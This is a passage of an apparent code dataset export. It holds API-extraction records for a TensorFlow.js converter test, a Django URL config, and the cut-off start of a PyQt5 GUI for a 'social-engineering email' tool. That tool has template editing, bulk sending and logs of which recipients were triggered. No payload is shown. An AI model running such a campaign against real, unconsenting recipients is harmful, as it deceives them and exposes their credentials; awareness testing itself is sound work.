'keras', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, self._tmp_dir])\\n\", (10097, 10180), False, 'import subprocess\\n'), ((12252, 12274), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (12272, 12274), True, 'import tensorflow as tf\\n'), ((12391, 12442), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (12403, 12442), False, 'import os\\n'), ((12514, 12641), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras',\\n '--split_weights_by_layer', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n '--split_weights_by_layer', h5_path, self._tmp_dir])\\n\", (12530, 12641), False, 'import subprocess\\n'), ((15148, 15174), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\\n', (15166, 15174), True, 'import tensorflow as tf\\n'), ((19228, 19267), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5')\\n\", (19240, 19267), False, 'import os\\n'), ((19369, 19391), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (19389, 19391), True, 'import tensorflow as tf\\n'), ((20277, 20299), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (20297, 20299), True, 'import tensorflow as tf\\n'), ((20317, 20353), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\\n', (20340, 20353), False, 'from tensorflow import keras\\n'), ((20577, 20616), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5')\\n\", (20589, 20616), False, 'import os\\n'), ((20718, 20740), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (20738, 20740), True, 'import tensorflow as tf\\n'), ((21200, 21222), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (21220, 21222), True, 'import tensorflow as tf\\n'), ((21695, 21751), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ([\"('tensorflowjs %s' % tfjs.__version__)\"], {}), \"('tensorflowjs %s' % tfjs.__version__)\\n\", (21713, 21751), True, 'import tensorflow as tf\\n'), ((21761, 21787), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\\n', (21779, 21787), True, 'import tensorflow as tf\\n'), ((22037, 22093), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ([\"('tensorflowjs %s' % tfjs.__version__)\"], {}), \"('tensorflowjs %s' % tfjs.__version__)\\n\", (22055, 22093), True, 'import tensorflow as tf\\n'), ((22103, 22129), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\\n', (22121, 22129), True, 'import tensorflow as tf\\n'), ((22366, 22394), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (22379, 22394), False, 'import shutil\\n'), ((22540, 22585), 'tensorflow.keras.layers.Reshape', 'keras.layers.Reshape', (['[2, 3]'], {'input_shape': '[6]'}), '([2, 3], input_shape=[6])\\n', (22560, 22585), False, 'from tensorflow import keras\\n'), ((22601, 22622), 'tensorflow.keras.layers.LSTM', 'keras.layers.LSTM', (['(10)'], {}), '(10)\\n', (22618, 22622), False, 'from tensorflow import keras\\n'), ((22638, 22681), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '\"\"\"sigmoid\"\"\"'}), \"(1, activation='sigmoid')\\n\", (22656, 22681), False, 'from tensorflow import keras\\n'), ((22788, 22846), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(6)'], {'input_shape': '[10]', 'activation': '\"\"\"relu\"\"\"'}), \"(6, input_shape=[10], activation='relu')\\n\", (22806, 22846), False, 'from tensorflow import keras\\n'), ((23045, 23071), 'tensorflow.keras.layers.Concatenate', 'keras.layers.Concatenate', ([], {}), '()\\n', (23069, 23071), False, 'from tensorflow import keras\\n'), ((23098, 23141), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'activation': '\"\"\"softmax\"\"\"'}), \"(4, activation='softmax')\\n\", (23116, 23141), False, 'from tensorflow import keras\\n'), ((23314, 23336), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (23334, 23336), True, 'import tensorflow as tf\\n'), ((23348, 23370), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (23363, 23370), True, 'import numpy as np\\n'), ((23559, 23618), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (23596, 23618), False, 'from tensorflow import keras\\n'), ((23701, 23736), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs\"\"\"'], {}), \"(self._tmp_dir, 'tfjs')\\n\", (23713, 23736), False, 'import os\\n'), ((23814, 23933), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\\n _tmp_dir, tfjs_output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\\n\", (23830, 23933), False, 'import subprocess\\n'), ((24057, 24100), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '\"\"\"model.json\"\"\"'], {}), \"(tfjs_output_dir, 'model.json')\\n\", (24069, 24100), False, 'import os\\n'), ((24231, 24271), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"new_h5.h5\"\"\"'], {}), \"(self._tmp_dir, 'new_h5.h5')\\n\", (24243, 24271), False, 'import os\\n'), ((24288, 24437), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\\n '--output_format', 'keras', model_json_path, new_h5_path]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\\n new_h5_path])\\n\", (24304, 24437), False, 'import subprocess\\n'), ((24691, 24727), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\\n', (24714, 24727), False, 'from tensorflow import keras\\n'), ((24902, 24924), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (24922, 24924), True, 'import tensorflow as tf\\n'), ((24937, 24958), 'numpy.random.randn', 'np.random.randn', (['(4)', '(8)'], {}), '(4, 8)\\n', (24952, 24958), True, 'import numpy as np\\n'), ((24970, 24992), 'numpy.random.randn', 'np.random.randn', (['(4)', '(10)'], {}), '(4, 10)\\n', (24985, 24992), True, 'import numpy as np\\n'), ((25193, 25252), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (25230, 25252), False, 'from tensorflow import keras\\n'), ((25335, 25370), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs\"\"\"'], {}), \"(self._tmp_dir, 'tfjs')\\n\", (25347, 25370), False, 'import os\\n'), ((25449, 25613), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras_saved_model',\\n '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'keras_saved_model', '--output_format', 'tfjs_layers_model', self.\\n _tmp_dir, tfjs_output_dir])\\n\", (25465, 25613), False, 'import subprocess\\n'), ((25742, 25785), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '\"\"\"model.json\"\"\"'], {}), \"(tfjs_output_dir, 'model.json')\\n\", (25754, 25785), False, 'import os\\n'), ((25916, 25956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"new_h5.h5\"\"\"'], {}), \"(self._tmp_dir, 'new_h5.h5')\\n\", (25928, 25956), False, 'import os\\n'), ((25973, 26122), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\\n '--output_format', 'keras', model_json_path, new_h5_path]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\\n new_h5_path])\\n\", (25989, 26122), False, 'import subprocess\\n'), ((26376, 26412), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\\n', (26399, 26412), False, 'from tensorflow import keras\\n'), ((26586, 26608), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (26606, 26608), True, 'import tensorflow as tf\\n'), ((26620, 26642), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (26635, 26642), True, 'import numpy as np\\n'), ((26831, 26890), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (26868, 26890), False, 'from tensorflow import keras\\n'), ((26973, 27008), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs\"\"\"'], {}), \"(self._tmp_dir, 'tfjs')\\n\", (26985, 27008), False, 'import os\\n'), ((27075, 27236), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', self._tmp_dir,\\n tfjs_output_dir]\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter', '--input_format', 'keras', self\\n ._tmp_dir, tfjs_output_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE\\n )\\n\", (27091, 27236), False, 'import subprocess\\n'), ((27573, 27595), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (27593, 27595), True, 'import tensorflow as tf\\n'), ((27607, 27629), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (27622, 27629), True, 'import numpy as np\\n'), ((27919, 27978), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (27956, 27978), False, 'from tensorflow import keras\\n'), ((28074, 28109), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs\"\"\"'], {}), \"(self._tmp_dir, 'tfjs')\\n\", (28086, 28109), False, 'import os\\n'), ((28187, 28306), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\\n _tmp_dir, tfjs_output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\\n\", (28203, 28306), False, 'import subprocess\\n'), ((28674, 28717), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs_sharded\"\"\"'], {}), \"(self._tmp_dir, 'tfjs_sharded')\\n\", (28686, 28717), False, 'import os\\n'), ((29738, 29778), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"new_h5.h5\"\"\"'], {}), \"(self._tmp_dir, 'new_h5.h5')\\n\", (29750, 29778), False, 'import os\\n'), ((30076, 30098), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (30096, 30098), True, 'import tensorflow as tf\\n'), ((30212, 30248), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\\n', (30235, 30248), False, 'from tensorflow import keras\\n'), ((30411, 30433), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (30431, 30433), True, 'import tensorflow as tf\\n'), ((30445, 30467), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (30460, 30467), True, 'import numpy as np\\n'), ((30757, 30816), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (30794, 30816), False, 'from tensorflow import keras\\n'), ((30912, 30947), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs\"\"\"'], {}), \"(self._tmp_dir, 'tfjs')\\n\", (30924, 30947), False, 'import os\\n'), ((31025, 31144), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\\n _tmp_dir, tfjs_output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\\n\", (31041, 31144), False, 'import subprocess\\n'), ((31516, 31559), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs_sharded\"\"\"'], {}), \"(self._tmp_dir, 'tfjs_sharded')\\n\", (31528, 31559), False, 'import os\\n'), ((32140, 32172), 'os.path.getsize', 'os.path.getsize', (['weight_files[0]'], {}), '(weight_files[0])\\n', (32155, 32172), False, 'import os\\n'), ((32487, 32545), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(10)'], {'activation': '\"\"\"relu\"\"\"', 'input_shape': '[4]'}), \"(10, activation='relu', input_shape=[4])\\n\", (32505, 32545), False, 'from tensorflow import keras\\n'), ((32561, 32604), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '\"\"\"sigmoid\"\"\"'}), \"(1, activation='sigmoid')\\n\", (32579, 32604), False, 'from tensorflow import keras\\n'), ((3047, 3069), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (3067, 3069), True, 'import tensorflow as tf\\n'), ((5716, 5741), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\\n', (5731, 5741), False, 'import os\\n'), ((6550, 6562), 'json.load', 'json.load', (['f'], {}), '(f)\\n', (6559, 6562), False, 'import json\\n'), ((8426, 8467), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.json\"\"\"'], {}), \"(self._tmp_dir, 'model.json')\\n\", (8438, 8467), False, 'import os\\n'), ((8917, 8956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"group*-*\"\"\"'], {}), \"(self._tmp_dir, 'group*-*')\\n\", (8929, 8956), False, 'import os\\n'), ((9901, 9940), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5')\\n\", (9913, 9940), False, 'import os\\n'), ((10416, 10428), 'json.load', 'json.load', (['f'], {}), '(f)\\n', (10425, 10428), False, 'import json\\n'), ((12334, 12373), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5')\\n\", (12346, 12373), False, 'import os\\n'), ((12877, 12889), 'json.load', 'json.load', (['f'], {}), '(f)\\n', (12886, 12889), False, 'import json\\n'), ((14813, 14850), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"foo.h5\"\"\"'], {}), \"(self._tmp_dir, 'foo.h5')\\n\", (14825, 14850), False, 'import os\\n'), ((14864, 14901), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"output\"\"\"'], {}), \"(self._tmp_dir, 'output')\\n\", (14876, 14901), False, 'import os\\n'), ((15780, 15818), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"model.json\"\"\"'], {}), \"(output_dir, 'model.json')\\n\", (15792, 15818), False, 'import os\\n'), ((15969, 16005), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"group*-*\"\"\"'], {}), \"(output_dir, 'group*-*')\\n\", (15981, 16005), False, 'import os\\n'), ((16612, 16650), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"model.json\"\"\"'], {}), \"(output_dir, 'model.json')\\n\", (16624, 16650), False, 'import os\\n'), ((16801, 16837), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"group*-*\"\"\"'], {}), \"(output_dir, 'group*-*')\\n\", (16813, 16837), False, 'import os\\n'), ((17506, 17544), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"model.json\"\"\"'], {}), \"(output_dir, 'model.json')\\n\", (17518, 17544), False, 'import os\\n'), ((18223, 18259), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"group*-*\"\"\"'], {}), \"(output_dir, 'group*-*')\\n\", (18235, 18259), False, 'import os\\n'), ((18865, 18903), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"model.json\"\"\"'], {}), \"(output_dir, 'model.json')\\n\", (18877, 18903), False, 'import os\\n'), ((19054, 19090), 'os.path.join', 'os.path.join', (['output_dir', '\"\"\"group*-*\"\"\"'], {}), \"(output_dir, 'group*-*')\\n\", (19066, 19090), False, 'import os\\n'), ((20017, 20058), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.json\"\"\"'], {}), \"(self._tmp_dir, 'model.json')\\n\", (20029, 20058), False, 'import os\\n'), ((21284, 21325), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.json\"\"\"'], {}), \"(self._tmp_dir, 'model.json')\\n\", (21296, 21325), False, 'import os\\n'), ((24123, 24154), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\\n', (24137, 24154), False, 'import os\\n'), ((24548, 24575), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\\n', (24562, 24575), False, 'import os\\n'), ((25808, 25839), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\\n', (25822, 25839), False, 'import os\\n'), ((26233, 26260), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\\n', (26247, 26260), False, 'import os\\n'), ((27452, 27478), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\\n', (27470, 27478), True, 'import tensorflow as tf\\n'), ((29332, 29350), 'os.path.getsize', 'os.path.getsize', (['f'], {}), '(f)\\n', (29347, 29350), False, 'import os\\n'), ((33392, 33443), 'os.path.join', 'os.path.join', (['layers_model_output_dir', '\"\"\"model.json\"\"\"'], {}), \"(layers_model_output_dir, 'model.json')\\n\", (33404, 33443), False, 'import os\\n'), ((33634, 33677), 'os.path.join', 'os.path.join', (['graph_model_dir', '\"\"\"model.json\"\"\"'], {}), \"(graph_model_dir, 'model.json')\\n\", (33646, 33677), False, 'import os\\n'), ((33725, 33768), 'os.path.join', 'os.path.join', (['graph_model_dir', '\"\"\"group*.bin\"\"\"'], {}), \"(graph_model_dir, 'group*.bin')\\n\", (33737, 33768), False, 'import os\\n'), ((6478, 6519), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.json\"\"\"'], {}), \"(self._tmp_dir, 'model.json')\\n\", (6490, 6519), False, 'import os\\n'), ((8014, 8024), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (8022, 8024), True, 'import tensorflow as tf\\n'), ((8273, 8283), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (8281, 8283), True, 'import tensorflow as tf\\n'), ((9794, 9804), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (9802, 9804), True, 'import tensorflow as tf\\n'), ((10338, 10379), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.json\"\"\"'], {}), \"(self._tmp_dir, 'model.json')\\n\", (10350, 10379), False, 'import os\\n'), ((12227, 12237), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (12235, 12237), True, 'import tensorflow as tf\\n'), ((12799, 12840), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.json\"\"\"'], {}), \"(self._tmp_dir, 'model.json')\\n\", (12811, 12840), False, 'import os\\n'), ((19344, 19354), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (19352, 19354), True, 'import tensorflow as tf\\n'), ((20252, 20262), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (20260, 20262), True, 'import tensorflow as tf\\n'), ((20693, 20703), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (20701, 20703), True, 'import tensorflow as tf\\n'), ((21175, 21185), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (21183, 21185), True, 'import tensorflow as tf\\n'), ((23289, 23299), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (23297, 23299), True, 'import tensorflow as tf\\n'), ((24877, 24887), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (24885, 24887), True, 'import tensorflow as tf\\n'), ((26561, 26571), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (26569, 26571), True, 'import tensorflow as tf\\n'), ((27548, 27558), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (27556, 27558), True, 'import tensorflow as tf\\n'), ((28957, 29000), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '\"\"\"model.json\"\"\"'], {}), \"(tfjs_output_dir, 'model.json')\\n\", (28969, 29000), False, 'import os\\n'), ((29212, 29257), 'os.path.join', 'os.path.join', (['sharded_model_dir', '\"\"\"group*.bin\"\"\"'], {}), \"(sharded_model_dir, 'group*.bin')\\n\", (29224, 29257), False, 'import os\\n'), ((29899, 29944), 'os.path.join', 'os.path.join', (['sharded_model_dir', '\"\"\"model.json\"\"\"'], {}), \"(sharded_model_dir, 'model.json')\\n\", (29911, 29944), False, 'import os\\n'), ((30051, 30061), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (30059, 30061), True, 'import tensorflow as tf\\n'), ((30386, 30396), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (30394, 30396), True, 'import tensorflow as tf\\n'), ((31769, 31812), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '\"\"\"model.json\"\"\"'], {}), \"(tfjs_output_dir, 'model.json')\\n\", (31781, 31812), False, 'import os\\n'), ((32022, 32067), 'os.path.join', 'os.path.join', (['sharded_model_dir', '\"\"\"group*.bin\"\"\"'], {}), \"(sharded_model_dir, 'group*.bin')\\n\", (32034, 32067), False, 'import os\\n'), ((12110, 12147), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"group*\"\"\"'], {}), \"(self._tmp_dir, 'group*')\\n\", (12122, 12147), False, 'import os\\n'), ((14555, 14592), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"group*\"\"\"'], {}), \"(self._tmp_dir, 'group*')\\n\", (14567, 14592), False, 'import os\\n'), ((27879, 27889), 'numpy.size', 'np.size', (['w'], {}), '(w)\\n', (27886, 27889), True, 'import numpy as np\\n'), ((30717, 30727), 'numpy.size', 'np.size', (['w'], {}), '(w)\\n', (30724, 30727), True, 'import numpy as np\\n'), ((3345, 3461), 'tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def', 'tf.compat.v1.saved_model.signature_def_utils.predict_signature_def', ([], {'inputs': \"{'x': x}\", 'outputs': \"{'output': output}\"}), \"(inputs={\\n 'x': x}, outputs={'output': output})\\n\", (3411, 3461), True, 'import tensorflow as tf\\n')]"}}},{"rowIdx":734,"cells":{"code":{"kind":"string","value":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n path('api-auth/', include('rest_framework.urls')),\n path('rest-auth/', include('rest_auth.urls')),\n path('rest-auth/registration/', include('rest_auth.registration.urls')),\n path('admin/', admin.site.urls),\n path('api/', include('core.api.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n\n\nif not settings.DEBUG:\n urlpatterns += [re_path(r'^.*',\n TemplateView.as_view(template_name='index.html'))]\n"},"apis":{"kind":"list like","value":["django.conf.urls.static.static","django.views.generic.TemplateView.as_view","django.urls.path","django.urls.include"],"string":"[\n \"django.conf.urls.static.static\",\n \"django.views.generic.TemplateView.as_view\",\n \"django.urls.path\",\n \"django.urls.include\"\n]"},"extract_api":{"kind":"string","value":"[((406, 437), 'django.urls.path', 'path', (['\"\"\"admin/\"\"\"', 'admin.site.urls'], {}), \"('admin/', admin.site.urls)\\n\", (410, 437), False, 'from django.urls import path, include, re_path\\n'), ((524, 585), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\\n', (530, 585), False, 'from django.conf.urls.static import static\\n'), ((241, 271), 'django.urls.include', 'include', (['\"\"\"rest_framework.urls\"\"\"'], {}), \"('rest_framework.urls')\\n\", (248, 271), False, 'from django.urls import path, include, re_path\\n'), ((297, 322), 'django.urls.include', 'include', (['\"\"\"rest_auth.urls\"\"\"'], {}), \"('rest_auth.urls')\\n\", (304, 322), False, 'from django.urls import path, include, re_path\\n'), ((361, 399), 'django.urls.include', 'include', (['\"\"\"rest_auth.registration.urls\"\"\"'], {}), \"('rest_auth.registration.urls')\\n\", (368, 399), False, 'from django.urls import path, include, re_path\\n'), ((456, 480), 'django.urls.include', 'include', (['\"\"\"core.api.urls\"\"\"'], {}), \"('core.api.urls')\\n\", (463, 480), False, 'from django.urls import path, include, re_path\\n'), ((701, 749), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '\"\"\"index.html\"\"\"'}), \"(template_name='index.html')\\n\", (721, 749), False, 'from django.views.generic import TemplateView\\n')]"}}},{"rowIdx":735,"cells":{"code":{"kind":"string","value":"#!/bin/bash\n# -*- coding: UTF-8 -*-\n# 基本控件都在这里面\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog,\n QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, \n QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView)\n\nfrom PyQt5.QtGui import QPalette, QColor, QBrush\nfrom PyQt5.QtCore import Qt, QDateTime\n\nfrom pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\nimport qdarkstyle, sys\n\nimport mylibrary.genmail as gm\n\nfrom GenAndSendMail import insert_send_mail\nfrom server.database import Database\nfrom server.sendmail import Smtp\nfrom server.client import Client\nfrom email import generator\nfrom pandas import DataFrame\nfrom copy import deepcopy\n\nclass SubWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.resize(400,100)\n self.main_layout = QGridLayout()\n self.setLayout(self.main_layout)\n\n self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n\n self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1)\n self.in_recipient = QLineEdit()\n self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5)\n self.btn_send = QPushButton('寄送')\n self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1)\n\nclass MailserverUi(QMainWindow):\n def __init__(self):\n super().__init__()\n\n setConfigOption('background', '#19232D')\n setConfigOption('foreground', 'd')\n setConfigOptions(antialias = True)\n \n # self.resize(720,500)\n self.init_ui()\n self.data_smtp = []\n self.data_db = []\n self.data_logs = []\n self.data_temp_logs = []\n\n # self.sub_win = SubWindow()\n\n # 默認狀態欄\n self.status = self.statusBar()\n self.status.showMessage(\"開發者: 鄭鈺城, 聯絡資訊: \")\n \n # 標題欄\n self.setWindowTitle(\"社交郵件工程\")\n self.setWindowOpacity(1) # 窗口透明度\n self.main_layout.setSpacing(0)\n \n self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n self.main_widget.setStyleSheet(\n \"\"\"\n QComboBox::item:checked {\n height: 12px;\n border: 1px solid #32414B;\n margin-top: 0px;\n margin-bottom: 0px;\n padding: 4px;\n padding-left: 0px;\n }\n \"\"\"\n )\n\n def init_ui(self):\n # 創建視窗主部件\n self.main_widget = QWidget() \n # 創建主部件的網格佈局\n self.main_layout = QGridLayout() \n # 設置窗口主部件佈局為網格佈局\n self.main_widget.setLayout(self.main_layout) \n\n # 創建左側部件\n self.left_widget = QWidget() \n self.left_widget.setObjectName('left_widget')\n self.left_layout = QGridLayout()\n self.left_widget.setLayout(self.left_layout) \n\n # 創建右側部件\n self.right_widget = QWidget() \n self.right_widget.setObjectName('right_widget')\n self.right_layout = QGridLayout()\n self.right_widget.setLayout(self.right_layout) \n\n # 左側部件在第0行第0列,佔12行3列\n self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3) \n # 右側部件在第0行第3列,佔12行8列\n self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8)\n # 設置視窗主部件\n self.setCentralWidget(self.main_widget) \n\n # 主要功能按鈕\n self.btn_sendmail = QPushButton(\"發送信件\")\n self.btn_sendmail.clicked.connect(self.display_send_mail)\n self.btn_smtp = QPushButton(\"系統設定\")\n self.btn_smtp.clicked.connect(self.display_smtp_setting)\n self.btn_db = QPushButton(\"資料庫設定\")\n self.btn_db.clicked.connect(self.display_db_setting)\n self.btn_update_eml = QPushButton(\"修改樣板\")\n self.btn_update_eml.clicked.connect(self.display_update_eml)\n self.btn_get_logs = QPushButton(\"\b觸發明細\")\n self.btn_get_logs.clicked.connect(self.display_logs)\n self.btn_download_logs = QPushButton(\"下載觸發明細\")\n self.btn_download_logs.clicked.connect(self.logs_download)\n self.quit_btn = QPushButton(\"退出\")\n self.quit_btn.clicked.connect(self.quit_act)\n\n 